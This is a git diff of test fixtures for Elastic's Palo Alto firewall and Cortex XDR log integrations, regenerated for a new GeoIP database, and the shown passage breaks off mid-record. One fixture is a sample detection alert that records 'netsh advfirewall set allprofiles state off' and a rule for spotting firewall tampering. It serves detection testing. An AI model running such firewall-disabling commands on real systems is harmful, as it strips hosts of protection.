"geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 214, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15435,7 +14975,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031915300Z", + "ingested": "2021-12-14T14:51:01.287251485Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15463,26 +15003,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 280, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15604,7 +15139,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031920700Z", + "ingested": "2021-12-14T14:51:01.287251838Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15632,26 +15167,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 172, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15773,7 +15303,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031926100Z", + "ingested": "2021-12-14T14:51:01.287252213Z", "original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:51.000-05:00", "timezone": "America/New_York", @@ -15801,26 +15331,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15933,7 +15458,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031931400Z", + "ingested": "2021-12-14T14:51:01.287252562Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -15961,26 +15486,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 94, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16102,7 +15622,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031936800Z", + "ingested": "2021-12-14T14:51:01.287252907Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16130,26 +15650,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 170, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16271,7 +15786,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031942300Z", + "ingested": "2021-12-14T14:51:01.287253250Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16299,26 +15814,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 94, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16440,7 +15950,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031947700Z", + "ingested": "2021-12-14T14:51:01.287253595Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16468,26 +15978,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 94, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16609,7 +16114,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031953Z", + "ingested": "2021-12-14T14:51:01.287254013Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16637,26 +16142,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 166, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16778,7 +16278,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031958300Z", + "ingested": "2021-12-14T14:51:01.287254360Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", diff --git a/packages/panw/manifest.yml b/packages/panw/manifest.yml index 0ed7312882c..574ebb118dd 100644 --- a/packages/panw/manifest.yml +++ b/packages/panw/manifest.yml @@ -1,6 +1,6 @@ name: panw title: Palo Alto Networks Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect PAN-OS firewall monitoring logs from Palo Alto Networks devices with Elastic Agent. type: integration diff --git a/packages/panw_cortex_xdr/changelog.yml b/packages/panw_cortex_xdr/changelog.yml index 5b24b1bec12..a7de1d15d7a 100644 --- a/packages/panw_cortex_xdr/changelog.yml +++ b/packages/panw_cortex_xdr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.6" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.5" changes: - description: Change test public IPs to the supported subset diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json index 7a8dcaaad14..97ce79bd2fe 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json @@ -588,7 +588,7 @@ "event": { "severity": 2, "reason": "Bioc Event", - "ingested": "2021-12-09T13:44:33.260263600Z", + "ingested": "2021-12-14T14:54:06.982155501Z", "original": "{\"external_id\":\"52517f58-0201-4d66-b5c4-00922664737e\",\"severity\":\"low\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1588792761983,\"local_insert_ts\":1588792547132,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":\"TAMPERING\",\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":[\"T1089 - Disabling Security Tools\"],\"mitre_tactic_id_and_name\":[\"TA0005 - Defense Evasion\"],\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":\"Windows 10 [10.0 (Build 17763)]\",\"agent_data_collection_status\":null,\"mac\":null,\"events\": {\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":\"AAABcetp1dDSqW1uAAY8Vw==\",\"event_type\":\"Registry Event\",\"event_timestamp\":1588792514182,\"actor_process_instance_id\":\"AdYj2qtgRtAAADjMAAAAAA==\",\"actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\",\"actor_process_image_name\":\"netsh.exe\",\"actor_process_command_line\":\"netsh advfirewall set allprofiles state off\",\"actor_process_signature_status\":\"Signed\",\"actor_process_signature_vendor\":\"Microsoft Corporation\",\"actor_process_image_sha256\":\"d70d165b6706c61c56f2ca91307f4bbdb9846acae1da3cfd84bf978ffb21af23\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_process_os_pid\":14540,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"causality_actor_process_execution_time\":1588792508244,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":\"0\",\"action_registry_key_name\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\",\"action_registry_value_name\":\"EnableFirewall\",\"action_registry_full_key\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\\\\EnableFirewall\",\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"os_actor_process_image_name\":\"svchost.exe\",\"os_actor_process_command_line\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k LocalServiceNoNetworkFirewall -p\",\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":\"N/A\",\"os_actor_process_image_sha256\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"os_actor_process_causality_id\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":\"1800\",\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":null,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},\"alert_id\":\"884236\",\"detection_timestamp\":1588792514182,\"name\":\"Windows Firewall disabled via Registry\",\"category\":\"Tampering\",\"endpoint_id\":\"98a86ba773fbe44f6b41ba2216fe2f53\",\"description\":[{\"pretty_name\":\"Registry\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"action type\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"action\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"action\"},{\"pretty_name\":\"Create Key\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Set Value\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"key name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"*system\\\\*\\\\services\\\\sharedaccess\\\\parameters\\\\firewallpolicy\\\\*\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"data\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"0\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"value name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"donotallowexceptions\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"enablefirewall\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"Process\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Symantec Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Symantec Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM 